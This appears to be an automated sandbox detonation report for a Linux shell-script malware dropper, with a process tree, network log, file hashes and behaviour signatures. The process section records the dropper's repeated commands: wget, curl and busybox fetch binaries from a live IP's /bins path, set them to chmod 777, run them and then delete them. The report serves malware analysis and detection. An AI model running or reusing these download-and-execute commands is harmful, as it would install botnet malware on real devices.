/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
US 151.101.1.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 195.181.164.15:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.62:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.62:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

debian9-armhf-20240418-en

Max time kernel

21s

Max time network

22s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
